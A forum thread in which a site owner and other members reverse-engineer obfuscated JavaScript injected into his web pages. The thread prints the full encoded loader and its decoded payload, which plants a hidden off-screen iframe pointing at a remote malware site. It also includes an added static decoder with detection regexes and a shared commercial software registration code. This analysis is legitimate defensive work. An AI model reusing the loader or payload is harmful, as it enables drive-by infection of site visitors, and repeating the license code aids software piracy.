Question: Analysing an obfuscated malware script | Bernhard Hiller (member), 29 Jul '12 - 21:48
A hacker added a JavaScript to many html pages of my site. Just after the body-tag he added:
<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--/c3284d-->
It somehow directs the browser to a site where the hacker deposited some malware for automatic download.
But I do not understand the details.
try{1-prototype;}catch(asd){x=2;} somehow sets x to 2 - but how does that happen?
v="eva";}if(v)e=window[v+"l"]; somehow creates an eval statement.
f (and then also w) contain an encrypted statement.
In the for loop, the statement gets decrypted by s=s+fromCharCode((w[j]*1+(9+eval("j%3"))));
and finally executed by e(s);.
Since I hardly ever write JavaScript, I fail to understand the details.
I hope that you have fun with analysing that script, and that you can share some hints on its function.
Answer: Re: Analysing an obfuscated malware script | Richard MacCutchan (MVP), 29 Jul '12 - 22:00
The original JavaScript is the long array of bytes, written as numbers so it is not easy to read. The part of the code that gets executed just converts the array back to its original script text and executes it. You need to take action to protect your website from this sort of malware injection.
One of these days I'm going to think of a really clever signature.

General: Re: Analysing an obfuscated malware script [modified] | enhzflep (member), 30 Jul '12 - 1:43
With the first bit, the try statement - it's code designed to fail, so the catch block steps in and sets x = 2.
 
After I pasted the code, there appeared to be two commas missing from between elements in the array - either that or 2 numbers were broken in half. So I'm still not sure that I've guessed correctly.
 
After some mind-numbing tracing, I got to a situation where the s in the e(s) statement is equal to:
 
"
function frmAdd() {
 
var ifrm = document.createElement('iframe');
 
ifrm.style.position='absolute';
 
ifrm.style.top='-999em';
 
ifrm.style.left='-999e
(9ggsk/tpd!>! iurq;-0msoed.dpfbrjpl/ec0n_jo,qin#<jdsn,je>!%gskJe%<epavncou,cpbz/_qqcoeAijje)ggsk*<~9ujobpx,poj
`c"<hqlCcc="
 
Which looks like junk to me, so I'll try again to paste the array correctly.
 
Wouldn't you just love to throttle the sod that did this.. :mad:
 

 
EDIT: Had another try - I had inserted extra commas the first time round - this was clearly wrong. This time I removed the spaces, wrapped it into a function and removed the final eval, outputting instead to the console. Here's the re-written code and the final payload. Enjoy!
 

function injectedCrap()
{
try{1-prototype;}catch(asd){x=2;}
if(x)
{	
	fr="fromChar";
	f=[ 4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,
		29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
		90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,
		97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,
		3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,
		94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,
		50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,
		102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,
		37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,
		90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,
		23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,
		92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,
		101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,
		98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,
		101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,
		93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,
		102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1 ];
	v="eva";
}
if(v)
	e=window[v+"l"];
w=f;
s=[];
r=String;
z=((e)?"Code":"");
zx=fr+z;
for(i=0;288-5+5-i>0;i+=1)
{
	j=i;
	if(e)
		s=s+r[zx]((w[j]*1+(9+e("j%3"))));
}
 
//if(x&&f&&012===10)e(s);
console.log(s);
}
 
Which, when all is done and dusted evaluates to this nasty piece of work:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://lundf-creation.de/main.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
 
Dirty elephanters!

modified 30 Jul '12 - 7:59.
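Decoding the array statically, as an added example that is not part of enhzflep's post or the original thread: the byte array is the one posted above, the shift rule 9 + (j % 3) is read straight from the injected loop, and the indicator regexes are my own assumption of what a site owner would grep decoded output for. Nothing here calls eval().

```javascript
// Added example, not from the thread: decode the injected array statically,
// without eval(). Array copied from enhzflep's post; the shift 9 + (j % 3)
// is read straight from the loop  w[j]*1 + (9 + eval("j%3")).
const INJECTED_ARRAY = [
  4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,
  29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
  90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,
  97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,
  3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,
  94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,
  50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,
  102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,
  37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,
  90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,
  23,95,106,105,103,48,36,38,98,106,101,90,91,36,89,103,
  92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,
  101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,
  98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,
  101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,
  93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,
  102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1,
];
// `prototype` is an undeclared identifier, so evaluating it throws a
// ReferenceError and the catch block runs; that side effect sets x = 2.
function whyCatchFires() {
  try { 1 - prototype; } catch (err) { return err.name; }
  return "no error";
}

// Equivalent of the injected loop: shift each byte by 9, 10 or 11 by position.
function decodeShiftedArray(arr) {
  let out = "";
  for (let j = 0; j < arr.length; j++) out += String.fromCharCode(arr[j] + 9 + (j % 3));
  return out;
}

// Defender-side triage of the decoded text: which hidden-iframe traits are present?
function hiddenIframeIndicators(src) {
  const checks = {
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/,
    positionedOffscreen: /\.(top|left)\s*=\s*['"]-\d+(em|px)['"]/,
    remoteSrc: /\.src\s*=\s*['"]https?:\/\//,
    attachedToBody: /document\.body\.appendChild\(/,
  };
  return Object.keys(checks).filter((k) => checks[k].test(src));
}

console.log(decodeShiftedArray(INJECTED_ARRAY));
console.log(hiddenIframeIndicators(decodeShiftedArray(INJECTED_ARRAY)));
```

The decoded string is exactly the frmAdd payload enhzflep printed, and all four indicators fire on it, which is the signature a site owner can scan injected pages for.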

General: Re: Analysing an obfuscated malware script | Bernhard Hiller (member), 30 Jul '12 - 4:48
Great! Thanks a lot.
General: Re: Analysing an obfuscated malware script | enhzflep (member), 30 Jul '12 - 23:41
Pleasure. :)
Thanks for something interesting to chew on.. :thumbsup:
General: Re: Analysing an obfuscated malware script | Bernhard Hiller (member), 31 Jul '12 - 2:26
In case that the hacker comes back (I hope that won't happen...), I'll post his new creation here.
Now I understand how drive-by infections work: open a "harmless" page with the injected script, an iframe is opened outside the visible area, and from there some malware gets installed. Really nice. Fortunately my computer was found clean after a 30-hour scan with 4 virus scanners.
General: Re: Analysing an obfuscated malware script | jkirkerx (member), 30 Jul '12 - 11:19
nice job!
 
That's pretty crafty there, on the original Javascript, an iFrame off the browser window, hidden from view.
 
Your code is crafty too.
General: Re: Analysing an obfuscated malware script | enhzflep (member), 30 Jul '12 - 23:40
Thanks Jim. :)
I've a 20 year history of reversing code - I taught myself to program in x86 ASM during high-school by disassembling whatever programs I had to hand.
 
It's just a matter of experience/exposure, I guess.
General: Re: Analysing an obfuscated malware script | jkirkerx (member), 31 Jul '12 - 8:12
So you must be around 48,
 
I took computer class in summer school of 1974 with wood shop. We had a Western Electric teletype machine, that stored our programs on yellow paper tape with rubber bands.
 
So we wrote programs in basic on paper, and typed them in, and ran them on a Sigma 7 Mainframe at UC Irvine.
 
In high school, I dropped computer class and took surf class instead, counted as a PE credit, should have stuck with it. Oh well.
 
Didn't pick up computers again till 1986, bought an IBM XT, but didn't know what to do with it, so I wrote programs in basic, and ran them off floppy disks. Bought a hard drive 2 years later.
 
I can reverse engineer a lot of things, but not code down to that level.
General: Re: Analysing an obfuscated malware script | enhzflep (member), 31 Jul '12 - 9:57
:-D
Nah, I'm just a young'n - 35, Wed next week, in fact.
 
Neato! Dad used to bring home punch cards for us to draw on as kids, back I suppose in about 1982 or so. We had a ball trying to imagine what all the 'dots' were that we were trying to join-up.
 
I think I was first exposed to Basic in about 1985 or so - A girl down the road had a ?? and I can remember vividly entering a program that would calculate your age in the year 2000 - a time that seemed a million years away. Damn - nearly as far past it now as we were before it, back then!
 
Isn't it funny where life takes us? I picked up programming when we were forced to occupy the computer-room at school when on detention.. I quickly swiped Turbo Pascal 6 and Turbo C++ 3.1 from the network. But when a fellow nerd gave me copies of his dad's TASM, MASM and Sourcer commenting disassembler I was like a you-know-what in a you-know-where! Still don't know what would have happened if I'd behaved the way I was supposed to back then..
 
Oh how I do envy you - we got our first piece of computerized anything in about 1990 when M&D spent about $4000 on a 386-33 complete with a whopping 40Mb HDD and 4, that's right count 'em, 4 MB of RAM.. That was an enormous purchase for M&D back then.
 
I was a bright but lonely kid, so was probably really lucky to have been exposed to computers at that time of my life - I still remember the stunning, overwhelming joy I felt as a 16 year old when I reverse-engineered the registration-code for UniVBE (video bios extender software) and turned shareware software into a registered version. :->
 
Heck, I still remember the reg code for Sourcer - B309868-ytht 20 years after I got it..
 
Now, if only I could reverse engineer people and social situations. :laughs:
 
Simon.
